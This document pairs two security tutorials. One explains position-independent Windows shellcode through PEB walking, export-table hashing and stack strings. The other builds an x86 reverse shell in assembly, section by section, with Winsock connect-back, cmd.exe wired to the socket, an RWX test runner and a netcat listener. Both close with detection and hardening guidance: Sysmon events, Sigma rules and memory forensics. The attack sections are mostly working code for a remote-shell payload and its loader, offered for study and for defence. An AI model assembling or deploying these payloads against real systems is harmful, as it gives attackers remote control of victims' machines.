Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses

Objective: Understand how Windows shellcode achieves position independence — resolving module bases through the TEB/PEB chain, walking PE export tables, hashing API names, and eliminating null bytes — so defenders can detect the resulting memory and behavioral signatures and authorized red teamers can build and test payloads correctly.

1. What Makes Code Position-Dependent?

A normal Windows executable contains absolute virtual addresses everywhere: indirect calls through the Import Address Table (IAT), references to global variables, jump tables, and so on. The PE loader fixes these up at load time using the .reloc section and patches the IAT against the modules it has just mapped.

Shellcode has none of that. It is raw opcodes copied into a memory region (often allocated by VirtualAlloc or written into another process), with no loader, no relocation table, no IAT, and no guarantee about where it will live. Any hardcoded virtual address — to a string, to an API, to a jump target — will be wrong the moment the payload moves.

The constraint is therefore strict: every address the shellcode needs must be computed at runtime, from a known starting point that the OS itself hands the thread. On Windows, that starting point is the Thread Environment Block (TEB).

2. The Problem with the IAT

A standard PE binary calls LoadLibraryA via something like call qword ptr [rip+IAT_LoadLibraryA] — an indirect jump through a slot the loader populated. Shellcode cannot do this:

It has no .idata section, no IMAGE_IMPORT_DESCRIPTOR, and no loader to read them.
It cannot embed an absolute kernel32!LoadLibraryA address because ASLR randomizes module bases every boot.
It cannot rely on Windows syscall numbers either — those numbers are not a stable ABI and shift between builds.

The standard solution is PEB walking: the shellcode traces the in-memory loader data structures to find kernel32.dll, parses its export table, and resolves the handful of APIs it actually needs (typically LoadLibraryA and GetProcAddress, which then bootstrap anything else).

3. Windows Memory Layout Primer: TEB, PEB, and the Loader

Every Windows thread has a TEB. The OS keeps a pointer to it in a segment register so user-mode code can reach it in a single instruction:

Architecture	Instruction	Result
x86	`MOV EAX, FS:[0x30]`	`EAX` ← `TEB.ProcessEnvironmentBlock` (PEB)
x64	`MOV RAX, GS:[0x60]`	`RAX` ← `TEB.ProcessEnvironmentBlock` (PEB)

From the PEB, shellcode chains through Ldr (a _PEB_LDR_DATA*) to reach the loader’s three doubly-linked lists of _LDR_DATA_TABLE_ENTRY records — one entry per loaded module.

Relevant offsets (Windows 10/11):

Struct	Field	x86 offset	x64 offset
`_TEB`	`ProcessEnvironmentBlock`	`+0x030`	`+0x060`
`_PEB`	`Ldr`	`+0x00C`	`+0x018`
`_PEB_LDR_DATA`	`InLoadOrderModuleList`	`+0x00C`	`+0x010`
`_PEB_LDR_DATA`	`InMemoryOrderModuleList`	`+0x014`	`+0x020`
`_PEB_LDR_DATA`	`InInitializationOrderModuleList`	`+0x01C`	`+0x030`
`_LDR_DATA_TABLE_ENTRY`	`DllBase`	`+0x018`	`+0x030`
`_LDR_DATA_TABLE_ENTRY`	`BaseDllName`	`+0x02C`	`+0x058`

Verify offsets on your target build with WinDbg (dt ntdll!_PEB, dt ntdll!_LDR_DATA_TABLE_ENTRY). They are stable across mainstream Windows 10/11 but not guaranteed forever.

// Conceptual layout — fields used by PEB-walking shellcode
typedef struct _LDR_DATA_TABLE_ENTRY {
    LIST_ENTRY     InLoadOrderLinks;        // +0x00
    LIST_ENTRY     InMemoryOrderLinks;      // +0x10 (x64)
    LIST_ENTRY     InInitializationOrderLinks;
    PVOID          DllBase;                 // +0x30 (x64)
    PVOID          EntryPoint;
    ULONG          SizeOfImage;
    UNICODE_STRING FullDllName;
    UNICODE_STRING BaseDllName;             // +0x58 (x64)
    // ...
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;

Flowchart showing the shellcode pointer chain from TEB via PEB and PEB_LDR_DATA to the kernel32.dll DllBase field — Every PIC shellcode begins here: a single segment-register read unravels the full loader chain to kernel32’s image base.

4. Walking the Module List to Find kernel32.dll

The loader populates InInitializationOrderModuleList in a predictable order: the main executable first, then ntdll.dll, then kernel32.dll. A common shortcut is to grab the third entry’s DllBase without ever comparing a name — fewer bytes, no strings, no signatures.

; x64 — locate kernel32.dll base via the PEB
; Output: RBX = kernel32.dll base address

    xor   rcx, rcx
    mov   rax, [gs:rcx + 0x60]      ; RAX = PEB
    mov   rax, [rax + 0x18]         ; RAX = PEB->Ldr
    mov   rax, [rax + 0x20]         ; RAX = InMemoryOrderModuleList.Flink (1st: this EXE)
    mov   rax, [rax]                ; 2nd entry: ntdll.dll
    mov   rax, [rax]                ; 3rd entry: kernel32.dll
    mov   rbx, [rax + 0x20]         ; LDR_DATA_TABLE_ENTRY.DllBase
                                    ; (offset 0x20 within an InMemoryOrder-rooted entry)

For 32-bit shellcode the same idea applies with smaller offsets:

; x86 — same walk, FS-relative
    xor   ecx, ecx
    mov   eax, [fs:ecx + 0x30]      ; EAX = PEB
    mov   eax, [eax + 0x0C]         ; PEB->Ldr
    mov   eax, [eax + 0x14]         ; InMemoryOrderModuleList.Flink
    mov   eax, [eax]                ; 2nd
    mov   eax, [eax]                ; 3rd (kernel32)
    mov   ebx, [eax + 0x10]         ; DllBase (x86 offset)

A more robust variant iterates the list and hash-compares BaseDllName.Buffer (Unicode), upper-casing each character inline. That survives reordering and is what production loaders use.

5. Parsing the PE Export Directory

Once RBX = kernel32!ImageBase, the shellcode parses the PE headers:

ImageBase
  └─► IMAGE_DOS_HEADER.e_lfanew (+0x3C)
        └─► IMAGE_NT_HEADERS
              └─► OptionalHeader.DataDirectory[0]  ; EXPORT
                    └─► IMAGE_EXPORT_DIRECTORY
                          ├─ NumberOfNames
                          ├─ AddressOfNames        (RVA → name RVAs)
                          ├─ AddressOfNameOrdinals (RVA → ordinal table)
                          └─ AddressOfFunctions    (RVA → function RVAs)

The three arrays are parallel: index i in AddressOfNames matches index i in AddressOfNameOrdinals, whose ordinal value o indexes AddressOfFunctions[o]. All values are RVAs, so the resolved function address is ImageBase + RVA.

; x64 — reach the export directory from RBX = ImageBase
; Output: RCX = IMAGE_EXPORT_DIRECTORY*
    mov   eax, dword [rbx + 0x3C]   ; DOS.e_lfanew
    lea   rdx, [rbx + rax]          ; RDX -> IMAGE_NT_HEADERS
    mov   eax, dword [rdx + 0x88]   ; NT.OptionalHeader.DataDirectory[0].VirtualAddress
    lea   rcx, [rbx + rax]          ; RCX -> IMAGE_EXPORT_DIRECTORY

    mov   r8d,  dword [rcx + 0x18]  ; NumberOfNames
    mov   r9d,  dword [rcx + 0x20]  ; AddressOfNames     (RVA)
    mov   r10d, dword [rcx + 0x24]  ; AddressOfNameOrdinals
    mov   r11d, dword [rcx + 0x1C]  ; AddressOfFunctions

The resolver then iterates 0..NumberOfNames-1, hashes the name string at ImageBase + Names[i], compares against a precomputed target, and on match returns ImageBase + Functions[ Ordinals[i] ].

Flowchart illustrating the three parallel export table arrays — AddressOfNames, AddressOfNameOrdinals, AddressOfFunctions — and how they combine to resolve a Windows API address at runtime — The export directory’s three parallel arrays form a two-step indirection: name index maps to ordinal, ordinal maps to function RVA.

6. Function Name Hashing (ROR-13)

Embedding the literal string "LoadLibraryA" would (a) introduce hardcoded data references and (b) be a trivial AV signature. The standard substitute is an inline rolling hash. The most common is ROR-13 add:

// Conceptual ROR-13 hash. Iterate bytes of the export name; stop at NUL.
// Same routine is implemented inline in assembly when resolving APIs.
unsigned int ror13_hash(const char *name) {
    unsigned int h = 0;
    while (*name) {
        h = (h >> 13) | (h << (32 - 13));   // ROR 13
        h += (unsigned char)*name++;
    }
    return h;
}

// Pre-computed constants (illustrative — recompute for your toolchain):
// LoadLibraryA   -> 0x0726774C
// GetProcAddress -> 0x7C0DFCAA
// ExitProcess    -> 0x73E2D87E
// VirtualAlloc   -> 0x91AFCA54

Replacing the while body with three cmp/ror/add instructions inside the export-walk loop produces a few dozen bytes of fully position-independent resolver — no strings, no absolute addresses, no relocations.

7. RIP-Relative Addressing and the CALL/POP Trick

When the shellcode does need inline data (a precomputed key, a config blob, a wide-string template), it must reference it without an absolute address.

x64 makes this nearly free: every LEA reg, [rel label] and direct CALL/JMP is encoded RIP-relative:

    lea   rcx, [rel api_hash_table]   ; RIP-relative, no relocation needed

x86 has no RIP-relative encoding. The classic substitute is the get-EIP trick: CALL past a label, then POP the return address into a register, giving you a known anchor:

    call  get_eip
get_eip:
    pop   ebp                          ; EBP = address of this instruction
    ; data referenced as [ebp + (label - get_eip)]

Anything stored inline can now be addressed by displacement from EBP.

8. Stack Strings and Null-Byte Elimination

Shellcode is often delivered via a string-copying primitive (strcpy, lstrcpyA, a parser that stops at \0), so embedded null bytes truncate the payload. Two problems must be solved together: avoid nulls in opcodes, and produce required strings ("kernel32.dll", "WinExec", "cmd.exe") without storing them as data.

Construct strings on the stack by pushing immediates:

; Build "cmd.exe\0" on the stack (8 bytes including NUL)
    xor   rax, rax
    push  rax                       ; trailing NUL via zeroed qword
    mov   rax, 0x6578652E646D63     ; 'cmd.exe' (little-endian, no embedded zero)
    push  rax
    mov   rcx, rsp                  ; RCX -> "cmd.exe\0" — first arg for WinExec

Eliminate accidental nulls in opcodes:

Avoid	Use instead	Reason
`mov rax, 0` (`48 C7 C0 00 00 00 00`)	`xor rax, rax`	Removes four NUL bytes
`push 0` (`6A 00`)	`xor reg, reg; push reg`	`6A 00` contains a NUL
Short jumps spanning NUL displacements	Pad with `nop` or reorder code	Avoids NUL in the offset byte
`mov al, 0x00`	`xor al, al`	Same fix at byte width

Always disassemble and grep the assembled output for \x00 before shipping — see Section 10.

9. x64 ABI Constraints: Shadow Space and Alignment

Windows x64 imposes two rules shellcode authors get wrong constantly:

RSP must be 16-byte aligned at the point of CALL to any Windows API. The CALL itself pushes an 8-byte return address, so the callee’s RSP ends up at (16N - 8) on entry, which is what Microsoft’s prolog code expects.
The caller allocates 32 bytes of shadow space (a.k.a. home space) above the return address, even when the callee takes 0–4 arguments. The callee may spill RCX, RDX, R8, R9 into those slots.

The first four integer arguments go in RCX, RDX, R8, R9; further arguments are pushed right-to-left. Volatile registers (RAX, RCX, RDX, R8–R11) may be clobbered by any CALL; non-volatile (RBX, RBP, RDI, RSI, R12–R15) must be saved if you rely on them.

; Calling WinExec("cmd.exe", SW_HIDE) once API is resolved in RAX
    and   rsp, -16                  ; force 16-byte alignment
    sub   rsp, 32                   ; shadow space (home space)

    lea   rcx, [rsp + 0x40]         ; pointer to "cmd.exe" (built earlier)
    xor   rdx, rdx                  ; uCmdShow = SW_HIDE (0)
    call  rax                       ; WinExec

    add   rsp, 32                   ; tear down shadow space

Misalignment typically manifests as STATUS_ACCESS_VIOLATION inside kernel32 or ntdll MMX/SSE prologs — a tell-tale crash signature when reviewing payloads.

10. Extraction and Controlled Testing

Once assembled with NASM, raw bytes are extracted from the COFF object and audited:

nasm -f win64 payload.asm -o payload.obj
objcopy -O binary -j .text payload.obj payload.bin

A quick Python harness verifies the payload is truly position-independent — no embedded nulls, no relocations:

# verify.py — sanity-check a raw shellcode blob
data = open("payload.bin", "rb").read()
print(f"[+] size: {len(data)} bytes")

null_offsets = [i for i, b in enumerate(data) if b == 0]
if null_offsets:
    print(f"[!] {len(null_offsets)} NUL byte(s), first at offset {null_offsets[0]:#x}")
else:
    print("[+] null-free")

# C-array dump for embedding in a test loader
print("unsigned char sc[] = {")
print(", ".join(f"0x{b:02x}" for b in data))
print("};")

A minimal local loader executes the payload inside the same process for isolated VM testing — this is the educational sandbox, not a cross-process injector:

// test_runner.cpp — local-only execution for analysis in a VM
// Defenders: this RWX + function-pointer-cast pattern is exactly what
// EDR/ETW THREATINT flags. It is shown so you know what to look for.
#include <windows.h>
#include <string.h>
extern unsigned char sc[];
extern size_t        sc_len;

int main(void) {
    void *mem = VirtualAlloc(NULL, sc_len,
                             MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE);
    memcpy(mem, sc, sc_len);
    ((void(*)())mem)();
    return 0;
}

The VirtualAlloc(PAGE_EXECUTE_READWRITE) → memcpy → indirect-call triad is the canonical shellcode runner pattern and is heavily instrumented.

11. Common Attacker Techniques

Technique	Description
PEB walking	Resolve `kernel32`/`ntdll` bases via `GS:[0x60]` / `FS:[0x30]` without imports
Export hash resolution	ROR-13 (or FNV/djb2) hashing to find APIs without embedded strings
Stack strings	Push immediates to materialise `"cmd.exe"`, `"WinExec"`, etc., on the stack
Reflective loading	PIC stub maps a full DLL into memory and calls its `DllMain` (T1620)
Remote injection	`VirtualAllocEx` + `WriteProcessMemory` + `CreateRemoteThread` into a target PID
APC queuing	`QueueUserAPC` to deliver shellcode into an alertable thread
Process hollowing	Suspend a benign process, unmap its image, write PIC payload, resume
Module stomping	Overwrite the `.text` of a legitimately loaded DLL with PIC shellcode

12. Defensive Strategies & Detection

PIC shellcode leaves consistent telemetry across Sysmon, ETW, and memory forensics.

Sysmon Event IDs to monitor:

Event ID	Signal
`1`	Process creation (with command line) — anomalous parents (`winword.exe` → `cmd.exe`)
`7`	`ImageLoad` from user-writable paths into system processes
`8`	`CreateRemoteThread` — primary remote-injection signal
`10`	`ProcessAccess` with `GrantedAccess` containing `0x1F0FFF`, `0x1410`, or `PROCESS_VM_WRITE \\| PROCESS_VM_OPERATION \\| PROCESS_CREATE_THREAD`
`17`/`18`	Named pipe creation/connection (common C2 channel)
`25`	`ProcessTampering` (image hollowing)

ETW providers give earlier and harder-to-evade signal: Microsoft-Windows-Threat-Intelligence (THREATINT) fires on VirtualAllocEx with PAGE_EXECUTE_READWRITE, WriteProcessMemory, and MapViewOfFile against remote processes. Consuming THREATINT requires a signed ELAM/PPL driver, which is why EDR vendors — not generic SIEMs — own this telemetry. Also enable the Audit Process Creation policy (Event ID 4688) with command-line inclusion, and Audit Kernel Object to capture OpenProcess handle requests.

Sigma sketch — cross-process handle access for injection:

title: Suspicious Cross-Process Access Likely Preceding Shellcode Injection
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 10
    GrantedAccess|contains:
      - '0x1F0FFF'    # PROCESS_ALL_ACCESS
      - '0x1410'      # VM_READ|VM_WRITE|VM_OPERATION
      - '0x1F1FFF'
    TargetImage|endswith:
      - '\lsass.exe'
      - '\svchost.exe'
      - '\explorer.exe'
  filter_legit:
    SourceImage|endswith:
      - '\MsMpEng.exe'
      - '\MsSense.exe'
  condition: selection and not filter_legit
level: high

Memory-forensics indicators: Volatility 3 malfind locates RWX regions containing executable code or PE headers in non-image memory; ldrmodules flags executable regions not represented in any of the three PEB loader lists — the canonical reflective/PIC signature. Threads whose StartAddress falls inside a heap allocation rather than a mapped image are inherently suspicious.

Hardening:

Mitigation	Effect
ACG (`ProcessDynamicCodePolicy`)	Forbids new executable pages; breaks `VirtualAlloc(PAGE_EXECUTE_READWRITE)`
DEP / NX	Hardware-enforced non-execute on data pages
CFG	Invalidates indirect calls to non-registered targets
HVCI	Hypervisor-enforced kernel code integrity
ASR rules	Block office/script children, untrusted USB execution, etc.
Restrict `SeDebugPrivilege`	Limits which accounts can open and write to other processes

Hierarchy diagram showing four defensive detection layers against PIC shellcode: ETW THREATINT telemetry, Sysmon event IDs, Volatility memory forensics, and OS hardening mitigations — Layered detection combines kernel-level ETW telemetry, Sysmon behavioral events, and offline memory analysis to catch shellcode across its full lifecycle.

13. Tools for PIC Shellcode Analysis

Tool	Description	Link
WinDbg	Verify struct offsets (`dt ntdll!_PEB`, `dt ntdll!_LDR_DATA_TABLE_ENTRY`)	microsoft.com
NASM	Assemble x86/x64 PIC payloads in Intel syntax	nasm.us
x64dbg	Dynamic analysis of shellcode in a loader harness	x64dbg.com
Ghidra / IDA	Static disassembly of extracted opcodes	ghidra-sre.org
Process Hacker	Inspect process memory regions and protections	processhacker.sf.io
`pe-sieve`	Hunts injected, hollowed, or stomped modules	github.com/hasherezade/pe-sieve
Volatility 3	`malfind`, `ldrmodules`, `vadinfo` for memory-resident PIC	volatilityfoundation.org
YARA	Signature ROR-13 loops, PEB-walk prologues, hash tables	virustotal.github.io/yara
SilkETW	Subscribe to THREATINT and Kernel-Process providers	github.com/mandiant/SilkETW

14. MITRE ATT&CK Mapping

Technique	MITRE ID	Detection
Reflective Code Loading	`T1620`	Volatility `malfind` / `ldrmodules`; THREATINT ETW
Process Injection (parent)	`T1055`	Sysmon EID `10` + EID `8`; ETW THREATINT WriteVM/AllocVM
Process Injection: DLL	`T1055.001`	Sysmon EID `7` from unusual paths; `pe-sieve`
Process Injection: APC	`T1055.004`	Kernel-Process ETW thread events on alertable waits
Process Injection: Hollowing	`T1055.012`	Sysmon EID `25` ProcessTampering; `pe-sieve` hollowing scan
Obfuscated Files or Information	`T1027`	YARA on ROR-13 hash loops and stack-string push sequences
Command and Scripting Interpreter	`T1059`	EID `4688` / Sysmon EID `1` with command-line auditing

Summary

Position-independent shellcode replaces the PE loader’s work at runtime: it must resolve every address it touches, starting from the segment-register pointer to the TEB.
The PEB → Ldr → InMemoryOrderModuleList chain reaches kernel32.dll in three pointer dereferences without any string comparison.
Parsing the PE export directory with ROR-13 hashed lookups removes embedded API name strings and the static signatures they create.
Stack-string construction, XOR-zero idioms, and RIP-relative addressing keep the byte stream null-free and relocation-free.
Defenders catch the resulting behaviour through Sysmon EID 8/10, THREATINT ETW on VirtualAllocEx/WriteProcessMemory, and Volatility malfind/ldrmodules against unbacked RWX regions — and harden processes with ACG, CFG, HVCI, and ASR rules to break the primitive entirely.

References

Writing Your First Shellcode: x86 Reverse Shell from Scratch

Objective: Understand how a Windows x86 reverse shell payload is hand-built in NASM assembly — walking the PEB to locate kernel32.dll, parsing the PE export table to resolve GetProcAddress without imports, initialising Winsock, and spawning cmd.exe over a socket — and learn the telemetry each stage emits so you can detect and defend against it.

1. What Is Shellcode? Constraints and Goals

Shellcode is a self-contained blob of machine code that runs after a control-flow hijack (or injection) with no loader, no imports, and no fixed base address. It is the raw payload that tools like msfvenom emit; understanding it byte-by-byte is what lets a defender recognise it in memory.

A Windows x86 reverse shell differs from a Linux equivalent in one fundamental way: Linux exposes a stable syscall/int 0x80 interface, while Windows forces you to call documented Win32 APIs — and you cannot import them, because injected code has no import table. You must therefore find the APIs yourself at runtime.

Constraint	Description
Position independent	Runs at an unknown address; all references are stack-relative or computed
Null-free	`\x00` terminates strings in many injection vectors and truncates the payload
No imports	API addresses must be resolved from loaded modules at runtime
Bad-char aware	`\x00`, `\x0a`, `\x0d` and vector-specific bytes must be avoided by design

Lab setup: a Windows 10 x86 VM, NASM for assembly, WinDbg for stepping the PEB walk, a small C runner to execute the blob, and a Python scanner to audit bad characters. Build and test only in an isolated VM.

2. x86 Calling Conventions and Stack Mechanics

Win32 APIs use stdcall: arguments are pushed right-to-left, and the callee cleans the stack with ret N. This matters because after a successful API call you do not adjust esp yourself — the function already did. cdecl (caller cleans) appears only in CRT helpers you will not touch here.

Convention	Stack Cleanup	Argument Order	Used By
`stdcall`	Callee (`ret N`)	Right-to-left	Win32 APIs (`CreateProcessA`, `WSASocketA`)
`cdecl`	Caller	Right-to-left	CRT functions

eax, ecx, and edx are volatile (caller-saved); ebx, esi, edi, and ebp survive a call. Shellcode exploits this: stash the kernel32 base in ebx and a resolver pointer in ebp, and they persist across every API call. Strings and structures are constructed by pushing dwords onto the stack in reverse, then referencing them directly through esp.

3. The PEB Walk: Finding kernel32.dll Without Imports

Every thread can reach its Process Environment Block (PEB) through the TEB at FS:[0x30]. The PEB holds Ldr (a PEB_LDR_DATA) at +0x0C, whose InMemoryOrderModuleList at +0x14 is a doubly-linked list of loaded modules. On Windows 7–11 x86 the load order is fixed: [0] the executable → [1] ntdll.dll → [2] kernel32.dll. Two FLink dereferences land on kernel32‘s entry, and DllBase sits 0x10 bytes past the InMemoryOrderLinks field.

bits 32
    xor    eax, eax
    mov    eax, [fs:0x30]      ; TEB->ProcessEnvironmentBlock (PEB)
    mov    eax, [eax+0x0c]     ; PEB->Ldr (PEB_LDR_DATA)
    mov    eax, [eax+0x14]     ; Ldr->InMemoryOrderModuleList (1st: executable)
    mov    eax, [eax]          ; FLink -> ntdll.dll entry
    mov    eax, [eax]          ; FLink -> kernel32.dll entry
    mov    ebx, [eax+0x10]     ; LDR entry->DllBase (kernel32 base) -> ebx

Verify the chain live in WinDbg before trusting any offset on your target build:

0:000> dt nt!_TEB @$teb ProcessEnvironmentBlock
0:000> dt nt!_PEB @$peb Ldr
0:000> dt nt!_PEB_LDR_DATA poi(@$peb+0xc) InMemoryOrderModuleList
0:000> dl poi(poi(@$peb+0xc)+0x14) 4

Flowchart showing the PEB walk chain from TEB at FS:[0x30] through PEB, PEB_LDR_DATA, and InMemoryOrderModuleList to reach kernel32.dll base address — Two FLink dereferences from the module list head land on kernel32.dll’s LDR entry; DllBase sits 0x10 bytes past the InMemoryOrderLinks field.

4. Export Table Parsing: Resolving GetProcAddress

The bootstrap problem: shellcode cannot call GetProcAddress until it has found GetProcAddress. The fix is to parse the kernel32 PE export table manually. From the base, e_lfanew at +0x3C reaches the NT headers; the export-directory RVA lives at NT +0x78; the directory exposes three parallel arrays — AddressOfNames (+0x20), AddressOfNameOrdinals (+0x24), and AddressOfFunctions (+0x1C).

; ebx = kernel32 base
    mov    eax, [ebx+0x3c]     ; e_lfanew
    mov    eax, [ebx+eax+0x78] ; export table RVA
    lea    edi, [ebx+eax]      ; edi -> IMAGE_EXPORT_DIRECTORY
    mov    ecx, [edi+0x20]     ; AddressOfNames RVA
    lea    ecx, [ebx+ecx]      ; -> name-pointer array
    xor    edx, edx            ; name index = 0
.next:
    mov    esi, [ecx+edx*4]    ; RVA of candidate name
    lea    esi, [ebx+esi]      ; -> ASCII name string
    ; compare esi against "GetProcAddress" (string or 4-byte hash) ...
    inc    edx
    jmp    .next
.match:
    mov    eax, [edi+0x24]     ; AddressOfNameOrdinals RVA
    movzx  eax, word [ebx+eax+edx*2]   ; ordinal index for this name
    mov    ecx, [edi+0x1c]     ; AddressOfFunctions RVA
    mov    eax, [ebx+ecx+eax*4]; function RVA
    lea    eax, [ebx+eax]      ; eax = VA of GetProcAddress

Production shellcode usually replaces the literal strcmp with a rolling 4-byte hash of each export name — it is smaller and naturally null-free.

Diagram of PE export table structure showing how shellcode traverses from kernel32 base address through NT headers to the export directory and its three parallel arrays to resolve GetProcAddress — Shellcode walks three parallel export arrays — names, ordinals, and functions — to translate a name hash into the final virtual address of GetProcAddress.

5. Bootstrapping Further API Resolution

Once GetProcAddress is resolved, save it (e.g. in ebp) and use it to resolve everything else. The first follow-up is LoadLibraryA, which lets you bring in ws2_32.dll and resolve the Winsock functions the reverse shell needs.

; ebp = resolved GetProcAddress, ebx = kernel32 base
    push   0x41797261          ; "aryA"
    push   0x7262694c          ; "Libr"
    push   0x64616f4c          ; "Load"
    mov    esi, esp            ; esi -> "LoadLibraryA"
    push   esi
    push   ebx                 ; hModule = kernel32
    call   ebp                 ; GetProcAddress -> LoadLibraryA in eax
    ; eax now holds LoadLibraryA; call it on "ws2_32.dll", then resolve
    ; WSAStartup, WSASocketA, WSAConnect, CreateProcessA, ExitProcess.

Every API name is pushed as reversed dwords so it reads correctly in memory. Wrap the resolve-and-call logic in a small subroutine that takes a module base and a name pointer; the reverse shell calls it seven times.

6. Winsock Initialisation and Socket Creation

WSAStartup(0x0202, &wsaData) must run before any socket API. Reserve the 400-byte WSADATA on the stack and pass a pointer; the OS fills it. Then WSASocketA(2, 1, 6, NULL, 0, 0) creates a TCP socket (AF_INET, SOCK_STREAM, IPPROTO_TCP).

    sub    esp, 0x190          ; reserve WSADATA (400 bytes)
    push   esp                 ; lpWSAData
    push   0x0202              ; wVersionRequired = 2.2
    call   <WSAStartup>

    xor    eax, eax
    push   eax                 ; dwFlags
    push   eax                 ; g
    push   eax                 ; lpProtocolInfo = NULL
    push   6                   ; IPPROTO_TCP
    push   1                   ; SOCK_STREAM
    push   2                   ; AF_INET
    call   <WSASocketA>        ; eax = socket handle
    mov    edi, eax            ; save socket in edi

Build the 16-byte SOCKADDR_IN inline and connect. The IP and port are stored network byte order (big-endian); 127.0.0.1:4444 becomes 0x0100007f and the packed family/port dword 0x5c110002.

    xor    eax, eax
    push   eax                 ; sin_zero[4..8]
    push   eax                 ; sin_zero[0..4]
    push   0x0100007f          ; sin_addr  = 127.0.0.1
    push   0x5c110002          ; sin_port 4444 | sin_family AF_INET
    mov    esi, esp            ; esi -> SOCKADDR_IN

    push   eax                 ; lpCallee/QoS chain (NULLs)
    push   eax
    push   eax
    push   eax
    push   0x10                ; namelen
    push   esi                 ; name -> SOCKADDR_IN
    push   edi                 ; socket
    call   <WSAConnect>

7. Spawning cmd.exe Over the Socket

The final stage is the most error-prone: a fully populated 68-byte STARTUPINFOA with cb = 0x44, dwFlags = STARTF_USESTDHANDLES (0x100), and all three standard handles pointed at the connected socket. CreateProcessA(NULL, " cmd.exe", ...) then launches the shell with stdin/stdout/stderr riding the TCP stream.

    xor    eax, eax
    push   edi                 ; hStdError  = socket
    push   edi                 ; hStdOutput = socket
    push   edi                 ; hStdInput  = socket
    times 9 push eax           ; zero lpReserved2..dwY (9 dwords)
    push   0x00000100          ; dwFlags = STARTF_USESTDHANDLES
    times 4 push eax           ; lpTitle, lpDesktop, lpReserved, wShowWindow pad
    push   0x44                ; cb = sizeof(STARTUPINFOA)
    mov    ebx, esp            ; ebx -> STARTUPINFOA

    sub    esp, 0x10
    mov    esi, esp            ; esi -> PROCESS_INFORMATION

    push   eax                 ; "....\0" terminator (runtime-supplied null)
    push   0x6578652e          ; ".exe"
    push   0x646d6320          ; " cmd"  (0x20 = space, null-free)
    mov    edx, esp            ; edx -> " cmd.exe"

    push   esi                 ; lpProcessInformation
    push   ebx                 ; lpStartupInfo
    push   eax                 ; lpCurrentDirectory
    push   eax                 ; lpEnvironment
    push   eax                 ; dwCreationFlags
    inc    eax
    push   eax                 ; bInheritHandles = TRUE
    dec    eax
    push   eax                 ; lpThreadAttributes
    push   eax                 ; lpProcessAttributes
    push   edx                 ; lpCommandLine = " cmd.exe"
    push   eax                 ; lpApplicationName = NULL
    call   <CreateProcessA>

    push   eax                 ; uExitCode
    call   <ExitProcess>

Sequential flowchart of the full reverse shell execution chain from PEB walk through export parsing, Winsock initialisation, TCP connect, STARTUPINFOA setup, and final CreateProcessA call spawning cmd.exe — Every stage builds on the last: the PEB walk feeds export parsing, which unlocks Winsock, which provides the socket handle wired into cmd.exe’s standard I/O.

8. Null-Byte Elimination and Bad-Character Audit

A single \x00 mid-payload can truncate your shellcode. Design it out from the start.

Bad Byte	Naive Source	Null-Free Replacement
`\x00`	`mov ecx, 0`	`xor ecx, ecx`
`\x00` in string	`push 0x00657865` (“exe\0”)	terminator from `push eax` after `xor eax,eax`
`\x00` in `mov al,0`	`mov al, 0`	`xor eax, eax` then use `al`
`\x0a` / `\x0d`	constant containing CR/LF	re-encode IP/port or split the immediate

The runtime-supplied terminator trick (xor eax, eax → push eax) keeps the " cmd.exe" string null-free, and the leading space the space-padded " cmd" introduces is tolerated by CreateProcessA‘s command-line parser. Audit the assembled binary with a scanner:

import sys
BAD = {0x00, 0x0a, 0x0d}                # extend per injection vector

with open(sys.argv[1], "rb") as f:
    sc = f.read()
for i, b in enumerate(sc):
    if b in BAD:
        print(f"[!] bad char 0x{b:02x} at offset {i}")
print(f"[*] {len(sc)} bytes scanned")

9. Testing and Verification

Assemble to a flat binary, then execute it in a controlled runner that mirrors how an exploit lands code in memory — VirtualAlloc with PAGE_EXECUTE_READWRITE, copy, and call through a function pointer.

nasm -f bin reverse.asm -o reverse.bin
python3 badchars.py reverse.bin

#include <windows.h>
#include <string.h>
unsigned char sc[] = { /* contents of reverse.bin */ };

int main(void) {
    void *mem = VirtualAlloc(NULL, sizeof(sc),
                             MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE);   // RWX: loud, lab-only
    memcpy(mem, sc, sizeof(sc));
    ((void(*)())mem)();
    return 0;
}

Catch the callback with nc -lvnp 4444. Note the RWX allocation — real-world loaders allocate RW, copy, then flip to RX with VirtualProtect precisely because PAGE_EXECUTE_READWRITE is a classic detection signal.

10. Common Attacker Techniques

Technique	Description
PEB walk	Locate `kernel32.dll` base with no imports via `FS:[0x30]`
Export hashing	Resolve APIs by name hash to stay small and null-free
Stack string building	Push reversed dwords to stage `" cmd.exe"`, `ws2_32.dll`, API names
STDIO redirection	Point `hStdInput/Output/Error` at the socket for an interactive shell
Process injection	Deliver the blob via `VirtualAllocEx` + `WriteProcessMemory` + `CreateRemoteThread`
RWX → RX staging	Allocate `RW`, copy, `VirtualProtect` to `RX` to evade RWX heuristics

11. Defensive Strategies and Detection

Each shellcode stage emits telemetry. Map detections to the chain, not to a single indicator.

Sysmon Event ID	Name	What It Catches
`1`	Process Create	`cmd.exe` with an unexpected `ParentImage` / `ParentCommandLine`
`3`	Network Connection	Outbound TCP from `cmd.exe` or a non-browser binary (C2 connect-back)
`8`	CreateRemoteThread	Cross-process thread where `SourceImage` ≠ `TargetImage`
`10`	ProcessAccess	`GrantedAccess` to injected memory; `CallTrace` containing `UNKNOWN`
`11`	FileCreate	Shellcode or loader dropped to disk

Windows Security auditing adds Event 4688 (process creation with command line, when ProcessCreationIncludeCmdLine_Enabled = 1), 5156 (WFP outbound TCP allowed — the reverse connect at the network layer), and 4689 (process exit, for shell-lifetime correlation). The kernel Microsoft-Windows-Threat-Intelligence ETW provider emits KERNEL_THREATINT_TASK_ALLOCVM/PROTECTVM on RWX activity but requires a signed ELAM/PPL consumer.

The canonical community Sigma rule for shellcode injection keys on ProcessAccess:

title: Shellcode Process Injection via Suspicious ProcessAccess
logsource:
  category: process_access
  product: windows
detection:
  selection:
    GrantedAccess:
      - '0x147a'
      - '0x1f3fff'
    CallTrace|contains: 'UNKNOWN'
  condition: selection
tags:
  - attack.defense_evasion
  - attack.privilege_escalation
  - attack.t1055
level: high

